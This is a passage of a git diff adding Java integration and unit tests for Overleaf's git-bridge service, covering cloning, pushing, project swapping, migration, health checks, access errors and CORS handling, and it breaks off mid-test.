getResource("/pushSucceedsAfterRemovingInvalidFiles/invalidState/" + PROJECT_ID), + testprojDir.toPath())); + assertEquals(0, runtime.exec("touch file1.exe", null, testprojDir).waitFor()); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 0, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_EXE_FILE, actual); + + // remove invalid file and push again; it should succeed this time + assertEquals(0, runtime.exec("git rm file1.exe", null, testprojDir).waitFor()); + gitCommit(testprojDir, "remove_invalid_file"); + server.setState(states.get("pushSucceedsAfterRemovingInvalidFiles").get("validState")); + gitPush(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushSucceedsAfterRemovingInvalidFiles/validState/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canServePushedFiles() throws IOException, ExecutionException, InterruptedException { + // + // I don't think we can test this completely without some changes to the mock server, because we + // have no way + // of pausing the test while the push is in progress. Once the push is over, the file isn't + // actually there for + // us to fetch any more. We can however test the access and error conditions, which comprise + // most of the logic. + // + int gitBridgePort = 33873; + int mockServerPort = 3873; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canServePushedFiles/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + gitPush(testprojDir); + + // With no key, we should get a 404. + String url = "http://127.0.0.1:" + gitBridgePort + "/api/testproj/push.tex"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With an invalid project and no key, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/push.tex"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With a bad key for a valid project, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/testproj/push.tex?key=notavalidkey"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + + // With a bad key for an invalid project, we should get a 404. + url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/push.tex?key=notavalidkey"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + } + + @Test + public void wlgbCanSwapProjects() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3874, getResource("/wlgbCanSwapProjects").toFile()); + server.start(); + server.setState(states.get("wlgbCanSwapProjects").get("state")); + wlgb = + new GitBridgeApp( + new String[] { + makeConfigFile(33874, 3874, new SwapJobConfig(1, 0, 0, 250, null, true)) + }); + wlgb.run(); + File rootGitDir = new File(wlgb.config.getRootGitDirectory()); + File testProj1ServerDir = new File(rootGitDir, PROJECT_ID1); + File testProj2ServerDir = new File(rootGitDir, PROJECT_ID2); + File testProj1Dir = gitClone(PROJECT_ID1, 33874, dir); + assertTrue(testProj1ServerDir.exists()); + assertFalse(testProj2ServerDir.exists()); + gitClone(PROJECT_ID2, 33874, dir); + while (testProj1ServerDir.exists()) + ; + assertFalse(testProj1ServerDir.exists()); + assertTrue(testProj2ServerDir.exists()); + FileUtils.deleteDirectory(testProj1Dir); + gitClone(PROJECT_ID1, 33874, dir); + while (testProj2ServerDir.exists()) + ; + assertTrue(testProj1ServerDir.exists()); + assertFalse(testProj2ServerDir.exists()); + } + + private static final List<String> EXPECTED_OUT_PUSH_SUBMODULE = + Arrays.asList( + "remote: hint: Your Git repository contains a reference we cannot resolve.", + "remote: hint: If your project contains a Git submodule,", + "remote: hint: please remove it and try again.", + "To http://127.0.0.1:33875/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid git repo)", + "error: failed to push some refs to 'http://127.0.0.1:33875/" + PROJECT_ID + "'"); + + @Test + public void pushSubmoduleFailsWithInvalidGitRepo() + throws IOException, GitAPIException, InterruptedException { + server = + new MockSnapshotServer(3875, getResource("/pushSubmoduleFailsWithInvalidGitRepo").toFile()); + server.start(); + server.setState(states.get("pushSubmoduleFailsWithInvalidGitRepo").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33875, 3875)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33875, dir); + runtime.exec("mkdir sub", null, testprojDir).waitFor(); + File sub = new File(testprojDir, "sub"); + runtime.exec("touch sub.txt", null, sub).waitFor(); + gitInit(sub); + gitAdd(sub); + gitCommit(sub, "sub"); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_SUBMODULE, actual); + } + + @Test + public void usesCustomErrorHandler() + throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33873; + int mockServerPort = 3873; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + // With an invalid project and no key, we should get a 404, + // which is rendered by our custom error handler. + String url = "http://127.0.0.1:" + gitBridgePort + "/api/notavalidproject/main.tex"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(404, response.getStatusCode()); + assertEquals("{\"message\":\"HTTP error 404\"}", response.getResponseBody()); + + // With an unsupported URL outside the api, the request is assumed to + // be from a git client and we should get a 401 because the request + // does not include basic auth credentials. + url = "http://127.0.0.1:" + gitBridgePort + "/foo"; + response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(401, response.getStatusCode()); + } + + @Test + public void cannotCloneAProtectedProjectWithoutAuthentication() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33883; + int mockServerPort = 3883; + + server = + new MockSnapshotServer( + mockServerPort, + getResource("/cannotCloneAProtectedProjectWithoutAuthentication").toFile()); + server.start(); + server.setState(states.get("cannotCloneAProtectedProjectWithoutAuthentication").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneA4xxProject() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33879; + int mockServerPort = 3879; + + server = + new MockSnapshotServer(mockServerPort, getResource("/cannotCloneA4xxProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneA4xxProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneAMissingProject() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33880; + int mockServerPort = 3880; + + server = + new MockSnapshotServer(mockServerPort, getResource("/cannotCloneAMissingProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneAMissingProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/" + PROJECT_ID, + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void canMigrateRepository() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33881; + int mockServerPort = 3881; + server = new MockSnapshotServer(mockServerPort, getResource("/canMigrateRepository").toFile()); + server.start(); + server.setState(states.get("canMigrateRepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + File testprojDir2 = gitClone(PROJECT_ID2, gitBridgePort, dir); + // Second project content is equal to content of the first + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canMigrateRepository/state/" + PROJECT_ID), testprojDir2.toPath())); + } + + @Test + public void skipMigrationWhenMigratedFromMissing() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33882; + int mockServerPort = 3882; + server = + new MockSnapshotServer( + mockServerPort, getResource("/skipMigrationWhenMigratedFromMissing").toFile()); + server.start(); + server.setState(states.get("skipMigrationWhenMigratedFromMissing").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + // don't clone the source project first + File testprojDir2 = gitClone(PROJECT_ID2, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/skipMigrationWhenMigratedFromMissing/state/" + PROJECT_ID2), + testprojDir2.toPath())); + } + + @Test + public void canCloneAMigratedRepositoryWithoutChanges() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33883; + int mockServerPort = 3883; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canCloneAMigratedRepositoryWithoutChanges").toFile()); + server.start(); + server.setState(states.get("canCloneAMigratedRepositoryWithoutChanges").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, gitBridgePort, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneAMigratedRepositoryWithoutChanges/state/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void rejectV1Repository() throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33884; + int mockServerPort = 3884; + server = new MockSnapshotServer(mockServerPort, getResource("/rejectV1Repository").toFile()); + server.start(); + server.setState(states.get("rejectV1Repository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/1234bbccddff.git", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + } + + @Test + public void cannotCloneAHasDotGitProject() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33885; + int mockServerPort = 3885; + + server = + new MockSnapshotServer( + mockServerPort, getResource("/cannotCloneAHasDotGitProject").toFile()); + server.start(); + server.setState(states.get("cannotCloneAHasDotGitProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/conflict.git", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + wlgb.stop(); + } + + @Test + public void cannotCloneProjectWithSlash() + throws IOException, GitAPIException, InterruptedException { + int gitBridgePort = 33886; + int mockServerPort = 3886; + + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + + wlgb.run(); + Process gitProcess = + runtime.exec( + "git clone http://git:password@127.0.0.1:" + gitBridgePort + "/project/1234abcd", + null, + dir); + assertNotEquals(0, gitProcess.waitFor()); + + List<String> actual = Util.linesFromStream(gitProcess.getErrorStream(), 0, ""); + assertEquals( + Arrays.asList( + "Cloning into '1234abcd'...", + "remote: Invalid Project ID (must not have a '/project' prefix)", + "fatal: repository 'http://127.0.0.1:33886/project/1234abcd/' not found"), + actual); + + wlgb.stop(); + } + + @Test + public void testStatusAndHealthCheckEndpoints() throws ClientProtocolException, IOException { + int gitBridgePort = 33887; + int mockServerPort = 3887; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpGet statusRequest = new HttpGet(urlBase + "/status"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpGet healthCheckRequest = new HttpGet(urlBase + "/health_check"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void testStatusAndHealthCheckEndpointsWithTrailingSlash() + throws ClientProtocolException, IOException { + int gitBridgePort = 33888; + int mockServerPort = 3888; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpGet statusRequest = new HttpGet(urlBase + "/status/"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpGet healthCheckRequest = new HttpGet(urlBase + "/health_check/"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void testStatusAndHealthCheckEndpointsWithHead() + throws ClientProtocolException, IOException { + int gitBridgePort = 33889; + int mockServerPort = 3889; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://127.0.0.1:" + gitBridgePort; + // Status + HttpHead statusRequest = new HttpHead(urlBase + "/status"); + HttpResponse statusResponse = client.execute(statusRequest); + assertEquals(200, statusResponse.getStatusLine().getStatusCode()); + // Health Check + HttpHead healthCheckRequest = new HttpHead(urlBase + "/health_check"); + HttpResponse healthCheckResponse = client.execute(healthCheckRequest); + assertEquals(200, healthCheckResponse.getStatusLine().getStatusCode()); + } + + @Test + public void gitLfsBatchEndpoint() throws ClientProtocolException, IOException, ParseException { + int gitBridgePort = 33890; + int mockServerPort = 3890; + server = new MockSnapshotServer(mockServerPort, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + HttpClient client = HttpClients.createDefault(); + String urlBase = "http://git:password@127.0.0.1:" + gitBridgePort; + HttpPost gitLfsRequest = + new HttpPost(urlBase + "/5f2419407929eb0026641967.git/info/lfs/objects/batch"); + HttpResponse gitLfsResponse = client.execute(gitLfsRequest); + assertEquals(422, gitLfsResponse.getStatusLine().getStatusCode()); + HttpEntity entity = gitLfsResponse.getEntity(); + String responseString = EntityUtils.toString(entity, "UTF-8"); + assertTrue(responseString.contains("Git LFS is not supported on Overleaf")); + } + + @Test + public void canPullIgnoredForceAddedFile() throws IOException, InterruptedException { + int gitBridgePort = 33891; + int mockServerPort = 3891; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canPullIgnoredForceAddedFile").toFile()); + server.start(); + server.setState(states.get("canPullIgnoredForceAddedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testProjDir = gitClone(PROJECT_ID, gitBridgePort, dir); + File one = new File(testProjDir, "sub/one.txt"); + one.createNewFile(); + FileWriter fw = new FileWriter(one.getPath()); + fw.write("1"); + fw.close(); + assertEquals(0, runtime.exec("git add -A -f", null, testProjDir).waitFor()); + gitCommit(testProjDir, "push"); + gitPush(testProjDir); + server.setState(states.get("canPullIgnoredForceAddedFile").get("withUpdatedMainFile")); + gitPull(testProjDir); + File f = new File(testProjDir.getPath() + "/sub/one.txt"); + assertTrue(f.exists()); + } + + @Test + public void canPullIgnoredFileFromOverleaf() throws IOException, InterruptedException { + int gitBridgePort = 33892; + int mockServerPort = 3892; + server = + new MockSnapshotServer( + mockServerPort, getResource("/canPullIgnoredForceAddedFile").toFile()); + server.start(); + server.setState(states.get("canPullIgnoredForceAddedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + File testProjDir = gitClone(PROJECT_ID, gitBridgePort, dir); + server.setState(states.get("canPullIgnoredForceAddedFile").get("withUpdatedMainFile")); + gitPull(testProjDir); + File f = new File(testProjDir.getPath() + "/sub/one.txt"); + assertTrue(f.exists()); + } + + @Test + public void noCors() throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33893; + int mockServerPort = 3893; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + String url = "http://127.0.0.1:" + gitBridgePort + "/status"; + Response response = asyncHttpClient().prepareGet(url).execute().get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + } + + @Test + public void cors() throws IOException, ExecutionException, InterruptedException { + + int gitBridgePort = 33894; + int mockServerPort = 3894; + + server = new MockSnapshotServer(mockServerPort, getResource("/canServePushedFiles").toFile()); + server.start(); + server.setState(states.get("canServePushedFiles").get("state")); + + wlgb = new GitBridgeApp(new String[] {makeConfigFile(gitBridgePort, mockServerPort)}); + wlgb.run(); + + String url = "http://127.0.0.1:" + gitBridgePort + "/status"; + + // Success + Response response = + asyncHttpClient() + .prepareOptions(url) + .setHeader("Origin", "https://localhost") + .execute() + .get(); + assertEquals(200, response.getStatusCode()); + assertEquals("", response.getResponseBody()); + assertEquals("https://localhost", response.getHeader("Access-Control-Allow-Origin")); + + response = + asyncHttpClient().prepareGet(url).setHeader("Origin", "https://localhost").execute().get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertEquals("https://localhost", response.getHeader("Access-Control-Allow-Origin")); + + // Deny + response = + asyncHttpClient() + .prepareOptions(url) + .setHeader("Origin", "https://not-localhost") + .execute() + .get(); + assertEquals(403, response.getStatusCode()); + assertEquals("", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + + response = + asyncHttpClient() + .prepareGet(url) + .setHeader("Origin", "https://not-localhost") + .execute() + .get(); + assertEquals(200, response.getStatusCode()); + assertEquals("ok\n", response.getResponseBody()); + assertNull(response.getHeader("Access-Control-Allow-Origin")); + } + + private String makeConfigFile(int port, int apiPort) throws IOException { + return makeConfigFile(port, apiPort, null); + } + + private String makeConfigFile(int port, int apiPort, SwapJobConfig swapCfg) throws IOException { + File wlgb = folder.newFolder(); + File config = folder.newFile(); + PrintWriter writer = new PrintWriter(config); + String cfgStr = + "{\n" + + " \"port\": " + + port + + ",\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"" + + wlgb.getAbsolutePath() + + "\",\n" + + " \"allowedCorsOrigins\": \"https://localhost\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:" + + apiPort + + "/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1:" + + port + + "\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"http://127.0.0.1:" + + apiPort + + "\""; + if (swapCfg != null) { + cfgStr += + ",\n" + + " \"swapStore\": {\n" + + " \"type\": \"memory\",\n" + + " \"awsAccessKey\": null,\n" + + " \"awsSecret\": null,\n" + + " \"s3BucketName\": \"com.overleaf.testbucket\"\n" + + " },\n" + + " \"swapJob\": {\n" + + " \"allowUnsafeStores\": true," + + " \"minProjects\": " + + swapCfg.getMinProjects() + + ",\n" + + " \"lowGiB\": " + + swapCfg.getLowGiB() + + ",\n" + + " \"highGiB\": " + + swapCfg.getHighGiB() + + ",\n" + + " \"intervalMillis\": " + + swapCfg.getIntervalMillis() + + " }\n"; + } + cfgStr += "}\n"; + writer.print(cfgStr); + writer.close(); + return config.getAbsolutePath(); + } + + private Path getResource(String path) { + return Paths.get( + "src/test/resources/" + "uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest" + path); + } + + private InputStream getResourceAsStream(String path) { + try { + return new FileInputStream(getResource(path).toFile()); + } catch (FileNotFoundException e) { + throw new RuntimeException(e); + } + } + + private static String withoutWhitespace(String s) { + return s.replaceAll("\\s", ""); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java new file mode 100644 index 0000000..8c102db --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/config/ConfigTest.java @@ -0,0 +1,95 @@ +package uk.ac.ic.wlgitbridge.application.config; + +import static org.junit.Assert.*; + +import java.io.Reader; +import java.io.StringReader; +import org.junit.Test; + +/* + * Created by winston on 25/10/15. + */ +public class ConfigTest { + + @Test + public void testConstructWithOauth() { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\"\n" + + "}\n"); + Config config = new Config(reader); + assertEquals(80, config.getPort()); + assertEquals("/var/wlgb/git", config.getRootGitDirectory()); + assertEquals("http://127.0.0.1:60000/api/v0/", config.getAPIBaseURL()); + assertEquals("http://127.0.0.1/", config.getPostbackURL()); + assertEquals("Overleaf", config.getServiceName()); + assertEquals("https://www.overleaf.com", config.getOauth2Server()); + } + + @Test(expected = AssertionError.class) + public void testConstructWithoutOauth() { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": null\n" + + "}\n"); + Config config = new Config(reader); + assertEquals(80, config.getPort()); + assertEquals("/var/wlgb/git", config.getRootGitDirectory()); + assertEquals("http://127.0.0.1:60000/api/v0/", config.getAPIBaseURL()); + assertEquals("http://127.0.0.1/", config.getPostbackURL()); + assertEquals("Overleaf", config.getServiceName()); + assertNull(config.getOauth2Server()); + } + + @Test + public void asSanitised() throws Exception { + Reader reader = + new StringReader( + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"apiBaseUrl\": \"http://127.0.0.1:60000/api/v0\",\n" + + " \"postbackBaseUrl\": \"http://127.0.0.1\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\"\n" + + "}\n"); + Config config = new Config(reader); + String expected = + "{\n" + + " \"port\": 80,\n" + + " \"bindIp\": \"127.0.0.1\",\n" + + " \"idleTimeout\": 30000,\n" + + " \"rootGitDirectory\": \"/var/wlgb/git\",\n" + + " \"allowedCorsOrigins\": [],\n" + + " \"apiBaseURL\": \"http://127.0.0.1:60000/api/v0/\",\n" + + " \"postbackURL\": \"http://127.0.0.1/\",\n" + + " \"serviceName\": \"Overleaf\",\n" + + " \"oauth2Server\": \"https://www.overleaf.com\",\n" + + " \"userPasswordEnabled\": false,\n" + + " \"repoStore\": null,\n" + + " \"swapStore\": null,\n" + + " \"swapJob\": null,\n" + + " \"sqliteHeapLimitBytes\": 0\n" + + "}"; + assertEquals( + "sanitised config did not hide sensitive fields", expected, config.getSanitisedString()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java new file mode 100644 index 0000000..e27c348 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/BridgeTest.java @@ -0,0 +1,87 @@ +package uk.ac.ic.wlgitbridge.bridge; + +import static org.mockito.Mockito.*; + +import java.io.IOException; +import java.util.ArrayDeque; +import java.util.Optional; +import org.junit.Before; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJob; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApiFacade; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; + +/* + * Created by winston on 20/08/2016. + */ +public class BridgeTest { + + private Bridge bridge; + + private ProjectLock lock; + private RepoStore repoStore; + private DBStore dbStore; + private SwapStore swapStore; + private SnapshotApiFacade snapshotAPI; + private ResourceCache resourceCache; + private SwapJob swapJob; + private GcJob gcJob; + + @Before + public void setup() { + lock = mock(ProjectLock.class); + repoStore = mock(RepoStore.class); + dbStore = mock(DBStore.class); + swapStore = mock(SwapStore.class); + snapshotAPI = mock(SnapshotApiFacade.class); + resourceCache = mock(ResourceCache.class); + swapJob = mock(SwapJob.class); + gcJob = mock(GcJob.class); + bridge = + new Bridge( + new Config(0, "", 0, "", null, "", "", "", null, false, null, null, null, 0), + lock, + repoStore, + dbStore, + swapStore, + swapJob, + gcJob, + snapshotAPI, + resourceCache); + } + + @Test + public void shutdownStopsSwapAndGcJobs() { + bridge.startBackgroundJobs(); + verify(swapJob).start(); + verify(gcJob).start(); + bridge.doShutdown(); + verify(swapJob).stop(); + verify(gcJob).stop(); + } + + @Test + public void updatingRepositorySetsLastAccessedTime() + throws IOException, GitUserException, CannotAcquireLockException { + ProjectRepo repo = mock(ProjectRepo.class); + when(repoStore.getExistingRepo("asdf")).thenReturn(repo); + when(dbStore.getProjectState("asdf")).thenReturn(ProjectState.PRESENT); + when(snapshotAPI.projectExists(Optional.empty(), "asdf")).thenReturn(true); + when(snapshotAPI.getDoc(Optional.empty(), "asdf")) + .thenReturn(Optional.of(mock(GetDocResult.class))); + when(snapshotAPI.getSnapshots(any(), any(), anyInt())).thenReturn(new ArrayDeque<>()); + bridge.getUpdatedRepo(Optional.empty(), "asdf"); + verify(dbStore).setLastAccessedTime(eq("asdf"), any()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java new file mode 100644 index 0000000..65fe3ed --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStoreTest.java @@ -0,0 +1,135 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertNull; + +import java.io.IOException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import java.time.temporal.ChronoUnit; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; + +/* + * Created by winston on 23/08/2016. + */ +public class SqliteDBStoreTest { + + private SqliteDBStore dbStore; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + dbStore = new SqliteDBStore(tmpFolder.newFile("dbStore.db")); + } + + @Test + public void testGetNumProjects() { + assertEquals(0, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf", 1); + assertEquals(1, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf1", 2); + assertEquals(2, dbStore.getNumProjects()); + dbStore.setLatestVersionForProject("asdf1", 3); + assertEquals(2, dbStore.getNumProjects()); + } + + @Test + public void swapTableStartsOutEmpty() { + assertNull(dbStore.getOldestUnswappedProject()); + } + + @Test + public void testGetOldestUnswappedProject() { + dbStore.setLatestVersionForProject("older", 3); + dbStore.setLastAccessedTime( + "older", Timestamp.valueOf(LocalDateTime.now().minus(5, ChronoUnit.SECONDS))); + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime( + "asdf", Timestamp.valueOf(LocalDateTime.now().minus(1, ChronoUnit.SECONDS))); + assertEquals("older", 